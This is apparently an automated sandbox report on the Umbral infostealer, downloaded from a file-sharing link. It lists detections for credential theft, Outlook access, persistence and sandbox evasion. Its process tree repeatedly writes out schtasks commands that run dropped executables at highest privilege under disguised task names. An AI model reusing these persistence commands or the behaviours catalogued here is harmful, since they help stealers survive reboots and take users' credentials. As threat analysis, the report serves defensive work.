Analysis
-
max time kernel
870s -
max time network
447s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250128-en -
resource tags
-
submitted
03-02-2025 15:21
General
-
Target
https://gofile.io/d/YHWmpb
Score
10/10
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
-
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
-
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Start PowerShell.
-
Downloads MZ/PE file 1 IoCs
-
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 5 IoCs
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 1 IoCs
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 15 IoCs
-
Modifies registry class 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 25 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/YHWmpb1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ff84a9646f8,0x7ff84a964708,0x7ff84a9647182⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:32⤵
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5732 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5732 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4284 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5980 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6404 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6528 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=5820 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6500 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6148 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6824 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1276 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2040 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1168 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7056 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6456 /prefetch:22⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3656 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1220 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3152 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6800 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6688 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7252 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7364 /prefetch:12⤵
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Downloads\BootstrapperNew.exe"C:\Users\Admin\Downloads\BootstrapperNew.exe"1⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Drops file in Program Files directory
- Drops file in Windows directory
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Access Update" /tr "C:\Program Files\xdwdWireshark Host.exe" & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Access Update" /tr "C:\Program Files\xdwdWireshark Host.exe"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Microsoft Edge Host" /tr "C:\Users\Public\Pictures\xdwdNode.js.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "Microsoft Edge Host" /tr "C:\Users\Public\Pictures\xdwdNode.js.exe" /RL HIGHEST3⤵
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵
-
